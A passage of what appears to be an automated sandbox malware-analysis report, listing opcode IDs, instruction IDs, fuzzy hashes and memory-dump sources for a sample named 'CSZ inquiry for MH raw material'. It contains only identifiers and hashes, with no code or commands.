                                                                        • Instruction ID: 17c652035114d8abfe8f0e26c2253ac46e1a6f878a6f13b33c1db44ca2727ca3
                                                                        • Opcode Fuzzy Hash: ceef46c79bc524e257678e60481feaf7af56958323c3ca39ee852204497745c4
                                                                        • Instruction Fuzzy Hash: C1315376A8012DABCB21DF54DC85FDEBBF9EB98350F1000A5B508B7251CA309E918FA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd0df40a7fa1d201bb8708e2ded5307cc097b4f9b16d2c2e7e9901646c56aa7e
                                                                        • Instruction ID: ec5792ec54c4f3b9a6f2fa87715a75008c4f3cbe6f8ce26a94e321baf7597b7e
                                                                        • Opcode Fuzzy Hash: bd0df40a7fa1d201bb8708e2ded5307cc097b4f9b16d2c2e7e9901646c56aa7e
                                                                        • Instruction Fuzzy Hash: 6E317C716002049FCB14DF6AD8C5A9B7BF4FF49344F8585A9F908EF286D270E949CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6880acf37eba8f29ad9edfdfd124f59e7cc75305580d4e1a8469efad4fce4720
                                                                        • Instruction ID: 4ee0d63193752f19754d4acd903f6eb96d9e5ac1361eca782b679c104c8705ac
                                                                        • Opcode Fuzzy Hash: 6880acf37eba8f29ad9edfdfd124f59e7cc75305580d4e1a8469efad4fce4720
                                                                        • Instruction Fuzzy Hash: E431C071A41605AFDB22ABA9CC51BABB7E9EB44754F141069F50DFB393DA30DD008BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 74a7b93352f9949650a2db7faf2f0ffa3d30dda68e1d5cca8b71d1d99996d702
                                                                        • Instruction ID: 97d327110c800e7ae4ab8138f37e4d9f633ce662d1774e94aa2a87cfe69bb69a
                                                                        • Opcode Fuzzy Hash: 74a7b93352f9949650a2db7faf2f0ffa3d30dda68e1d5cca8b71d1d99996d702
                                                                        • Instruction Fuzzy Hash: 2231A272A04752DBC711EE688880FABBBA5EF94750F15852DFC56A7311DA30DC019BF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8654fab76eca190697b016aeee0a2bf87075cccd4b801453aa3eecfd225dfb09
                                                                        • Instruction ID: 39f9bdfb66b1c74aed3c1618386626c2d255b6994baf19fa26e061c5c7327e95
                                                                        • Opcode Fuzzy Hash: 8654fab76eca190697b016aeee0a2bf87075cccd4b801453aa3eecfd225dfb09
                                                                        • Instruction Fuzzy Hash: 69319A716193129FD720CF19C840F6AB7E4FB88700F184A6DF984AB291D7B1EC44DBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction ID: 16255f76cae52cc94c96272639afcb0a4a453a4e4b0539c2590c56525ee5840b
                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction Fuzzy Hash: DE316AB2B00B05AFD724DF69DD41B67B7F8AB08B50F19882DA59AD3650E630E900CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c6bff928cd7dbcedbedffed47a589d45f510f907a887b7e6e3677895d02b4ac
                                                                        • Instruction ID: 847539f75efa43b5b6d5d50588b23e9be2cb4f5d70171242db51d234e7feaaf8
                                                                        • Opcode Fuzzy Hash: 6c6bff928cd7dbcedbedffed47a589d45f510f907a887b7e6e3677895d02b4ac
                                                                        • Instruction Fuzzy Hash: 5C31BAB56453818FC710DF18D44186ABBF1FF99758F445AAAF488AB391D3309E04CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 834bc679f9243181baa46ca7cf4afdbaa5eefed12ff78495052b080b28ed3c88
                                                                        • Instruction ID: 9dfb09e779daffec1c9237b3c5b01821687f25ab4920b6759b1c79ff9ad04a35
                                                                        • Opcode Fuzzy Hash: 834bc679f9243181baa46ca7cf4afdbaa5eefed12ff78495052b080b28ed3c88
                                                                        • Instruction Fuzzy Hash: B731C431B002959FC714EFAAC981B6F77F9EB84304F10852AE046E7291D774EA45CBB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction ID: 0caf6e465f95daa09f30c770fc11a62297d0539aa9b5a360352270efaf0e448f
                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction Fuzzy Hash: 0921F236E1125AAACB119FB58801BFFBBB5EF14740F199036A966FB340E230CD4087B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a96bd1e1ec5109f21af342e8d4c804268e1870bcdb8286117d406235b23f46e7
                                                                        • Instruction ID: 5d3f1dd7fa1b4e819a80bfa27123751bef02cc383e7ebfd4a82873160ce0c452
                                                                        • Opcode Fuzzy Hash: a96bd1e1ec5109f21af342e8d4c804268e1870bcdb8286117d406235b23f46e7
                                                                        • Instruction Fuzzy Hash: 53310E715042109BCB20AF14CC41BF977B4EF50318F54926AEC85AB392EA74DDC5CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction ID: 9362bdb1d09f64f79883fdfca153476cf7998df93e5841ff37c4a970f668c7c3
                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction Fuzzy Hash: 63210836600655B6CB24AF958C11ABBB7B9EF80710F50D41EFAA9E6691F634D940C3B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b40e6175b47f502595a3ca97d0201c62aee6ea0dad612d221a7c424c33f59ebd
                                                                        • Instruction ID: bdf6ec82196187befaa2fc8945acd3ee1cda0dd33b3a31e2726782de144a7cfe
                                                                        • Opcode Fuzzy Hash: b40e6175b47f502595a3ca97d0201c62aee6ea0dad612d221a7c424c33f59ebd
                                                                        • Instruction Fuzzy Hash: 7E319F32A0152CEBDB319B14CC42FEEB7B9EB15740F0501A5E646A7291D6B4EE809EB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eb3ac1c7f62f382577c2299bfd72f8633f284b5e57149bbdbf1f342ee2591c49
                                                                        • Instruction ID: 870fc13603f1767df3351a56621322c25c48f42364b01040d8bdf52b4fed8b48
                                                                        • Opcode Fuzzy Hash: eb3ac1c7f62f382577c2299bfd72f8633f284b5e57149bbdbf1f342ee2591c49
                                                                        • Instruction Fuzzy Hash: 2E21A0726087499BC721EF58D881B6B77E4EF88760F068519FA54AB341D730ED018BB2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction ID: 9848eafe571fc54cbb724ca7d8a74f65d9373a97d4405bcddd528e93b7b10720
                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction Fuzzy Hash: E3216031A00608ABCB15DF58C980A9BB7E5FF49714F11C065FE15DB241D671EA458BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81a46e86b3a08ee7e479a329733400ae99b4a88eb5ee3655547f8ca10de328ee
                                                                        • Instruction ID: e7e49b3aa5a88a360d45fc64d19b74e79379956685bcacf51bce43404d5eb50e
                                                                        • Opcode Fuzzy Hash: 81a46e86b3a08ee7e479a329733400ae99b4a88eb5ee3655547f8ca10de328ee
                                                                        • Instruction Fuzzy Hash: 66314171A00119AFCF18DFA5D894A9FBBB9FF88314F454229EA15F7241DB306E04CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction ID: f53f2d95b3a301688ec6f6af0ba527aa9add6c984115084a6becaa04c16ff755
                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction Fuzzy Hash: 87317831600604EFDB21DF68C884FAAB7F9EF85354F2445A9E5529B291E770EE42CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 419a0272e2763932d3e341616282beb7b73a5b0e056bae6a80af4365371f1fef
                                                                        • Instruction ID: 246b639aa881e216c4e2269170a4720db17bfe8bde035bc470ddef1666778443
                                                                        • Opcode Fuzzy Hash: 419a0272e2763932d3e341616282beb7b73a5b0e056bae6a80af4365371f1fef
                                                                        • Instruction Fuzzy Hash: 1D315A75A002059FCB14CF58C9899AEBBF5EFD4304F15545AE80AAB391E771EA50CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17a2aefbb7b55b73ca4b822258bd54f21e61b1b6cabf114ce779bf11231637aa
                                                                        • Instruction ID: eedd1547f1361b665b335d58d6c97973bd5277bc336ab20f6f18d2453cdb88a0
                                                                        • Opcode Fuzzy Hash: 17a2aefbb7b55b73ca4b822258bd54f21e61b1b6cabf114ce779bf11231637aa
                                                                        • Instruction Fuzzy Hash: 1921E1326002058FDB28CE29C8806B6B3E6EFD4304F965438D905EB282D730FC55CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f62c1a62b5bbfce0513a32d5ea088019ed11111e53f83b63e2ae7dfe44c7b76f
                                                                        • Instruction ID: 20dd45c3df8eeda45f0185715a0a696efee508bd9c4a0bb55914c9d00f15eea9
                                                                        • Opcode Fuzzy Hash: f62c1a62b5bbfce0513a32d5ea088019ed11111e53f83b63e2ae7dfe44c7b76f
                                                                        • Instruction Fuzzy Hash: 94219C75A006299FCB10EF59D881ABEB7F4FF48744B50006AFA41BB250D778AD41CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a582bb83ea5b0bfde5aba6d16b83d48f2425ba1053670f273695f8c2abbc38ac
                                                                        • Instruction ID: 15a76222b6b34a95e4484cf4f6531d1b025bb6389db47b9a4b5fcb299a9bc3de
                                                                        • Opcode Fuzzy Hash: a582bb83ea5b0bfde5aba6d16b83d48f2425ba1053670f273695f8c2abbc38ac
                                                                        • Instruction Fuzzy Hash: BD21AE71600644AFC715DB68D944F6AB7B8FF88744F14016AF944E77A2D634EE40CBA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de41c92411950773ba611e23cc87255ca38559e8bcf47940a1d3e0e5937a7bac
                                                                        • Instruction ID: 430493f229c79990d1b3b3a024fc9950b1281918dcbe7938a50bf4d5dd143827
                                                                        • Opcode Fuzzy Hash: de41c92411950773ba611e23cc87255ca38559e8bcf47940a1d3e0e5937a7bac
                                                                        • Instruction Fuzzy Hash: 8921B3729043459BC711EF59E848F5BBBDCEF91344F080466BE80D7262D774DA44C6B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 306fcadfaf69a3031fcac25c5a2c723f3600b88113cebe5386098370ce461804
                                                                        • Instruction ID: fcf28e8e9170f79fc4bf232e2f9fbc87140c1b3fa51995147eb97cfc8a4a0868
                                                                        • Opcode Fuzzy Hash: 306fcadfaf69a3031fcac25c5a2c723f3600b88113cebe5386098370ce461804
                                                                        • Instruction Fuzzy Hash: D62123316446D19BE32267289C44F2437D9EF41B78F2C03B4F960ABAE2DB68CC018632
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c6ff2d0bfeb50a10ca31561050fb0801198b83beee0870d67094a92fbf6590b
                                                                        • Instruction ID: a1dc40ed1a99730c947baabfd298516265a8709d7fc2397c3bd6a549eafa96dc
                                                                        • Opcode Fuzzy Hash: 8c6ff2d0bfeb50a10ca31561050fb0801198b83beee0870d67094a92fbf6590b
                                                                        • Instruction Fuzzy Hash: 2021E4612042504FD709CB1AA8B44B6BFE5EFC662970A86E7D884CF343C225A80AD7B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9033934fafd4abeb4037a798aa8782ef68607f5f52b27d6ec58d047cf4ff1a29
                                                                        • Instruction ID: 862b52bc92a149ecd40f3469b17ac48fee8eeae245af1bfd43df1a7805037d24
                                                                        • Opcode Fuzzy Hash: 9033934fafd4abeb4037a798aa8782ef68607f5f52b27d6ec58d047cf4ff1a29
                                                                        • Instruction Fuzzy Hash: 4021BB75200A50AFC728DF69CC01B56B7F5EF48B48F248469A549DBB62E331E942CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b1aa929e36e1b1d73c9bad901fcf0a9f9727bc3d466eb7d749e43dad5d383c0
                                                                        • Instruction ID: d60d7f4a3e1c6dcd9de4ec6c1bcba3be160b7343844d54833d601d62ebfd2b0b
                                                                        • Opcode Fuzzy Hash: 1b1aa929e36e1b1d73c9bad901fcf0a9f9727bc3d466eb7d749e43dad5d383c0
                                                                        • Instruction Fuzzy Hash: 3B110672380B11BFE32256549C01F6F7699DBC4B60F298038B71CEB2D1EAB0DC0197A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d68e9704b6bac2c6e89bdfd0762f45b2d2d699e873c09cbf5672cfe216f6f342
                                                                        • Instruction ID: 65391357dbce34352d2fe86a27b1a333c205bf04883e84d024640f069a84180e
                                                                        • Opcode Fuzzy Hash: d68e9704b6bac2c6e89bdfd0762f45b2d2d699e873c09cbf5672cfe216f6f342
                                                                        • Instruction Fuzzy Hash: 4821E7B1E00218AFCB14DFAAD981AAEFBF9EF98700F10022EE505B7251D6749945CB64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction ID: d57c664e80f0a8fb594b2145dbf4fe3a7e422bf9df9d06d6ce69a4edcadfe779
                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction Fuzzy Hash: 79218E72A00609EFDF129F98CD41BAEBBB9EF58311F201859F940B7251DB34DD519B60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f62ab0186a594ab314387afd62649c7adbd09eb6ed78ade26212c1718a9f06a
                                                                        • Instruction ID: cf9238f3738244fdf8c18f2c22cbb1cd934c63d6c04242efa208c551145db6c8
                                                                        • Opcode Fuzzy Hash: 0f62ab0186a594ab314387afd62649c7adbd09eb6ed78ade26212c1718a9f06a
                                                                        • Instruction Fuzzy Hash: 3D21B133A108119F9B19CF3DC8044AAF7E6EFCC31436A427AD916EB2A5D770B915C684
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction ID: 9f48e50a967ec6942efb17c4abff01e15f5e00ba270d388c7da86991c6a3b18a
                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction Fuzzy Hash: A211BF72601709AFD7229F54DC41FAABBB8EB80754F16802AFB059B291D671EE44CB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31cd845e49f9e95a158de5c9584faaae1d7146b014c119d14ae623219576d135
                                                                        • Instruction ID: 4a0ac9785ad8c5bcb08d86119f29ec810051c10fcc4ffcce2c5a1245d57ffbbb
                                                                        • Opcode Fuzzy Hash: 31cd845e49f9e95a158de5c9584faaae1d7146b014c119d14ae623219576d135
                                                                        • Instruction Fuzzy Hash: CD118F357017629FCB15CF49C580F66B7E9EF4A750B2C806DED089F245EAB2ED0197A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction ID: bdff435888d62b6fd1740e1058ad35dfd3578bfb8702a134a1db1ac72024d2c6
                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction Fuzzy Hash: 732198B2600649DFC7219F49C540A36F7E6EBA4B10F26802EEA8A97614C630ED00DBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a59c129d785e3ff2883c100bab70260f08eebc76cb62ff8d79d252b43c5d538
                                                                        • Instruction ID: 27cbee99c7c00640d96545f25b3dcfaf633c313bcfdbf589dca0b63f592314f3
                                                                        • Opcode Fuzzy Hash: 3a59c129d785e3ff2883c100bab70260f08eebc76cb62ff8d79d252b43c5d538
                                                                        • Instruction Fuzzy Hash: B7214C75A00206DFCB14CF58C591F6ABBF5FB88314F28416DD105AB314CB71AD06DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e53e15827a644e2e43367efc4d38abb2bcabd0ff266d619f0712ee76aafc479
                                                                        • Instruction ID: 814598cd9d69d74b0bbf76671adce3a3b22decef48c5a97258407760390fce86
                                                                        • Opcode Fuzzy Hash: 3e53e15827a644e2e43367efc4d38abb2bcabd0ff266d619f0712ee76aafc479
                                                                        • Instruction Fuzzy Hash: 02216A75600A04EFC7209F68C881B76B3E8FF84354F55882DE59AD7A61DA30ED40DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ce5cea424fc0e74c6aa615c4b3dd887f82210cd3e8fad7d0d1817244eae12e4
                                                                        • Instruction ID: 685bb2de093777cf25710db35c64da0c1e653780435f0f62463bfef155e56f93
                                                                        • Opcode Fuzzy Hash: 7ce5cea424fc0e74c6aa615c4b3dd887f82210cd3e8fad7d0d1817244eae12e4
                                                                        • Instruction Fuzzy Hash: A71108773001649BCB19DB25CC82A6B73A7DBD5374B39553AE922AB391D930DC02C6A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a9ec53c0489ebcf3790f2c93648d2ed775a0404cb18b063b9851968d7b4c8e23
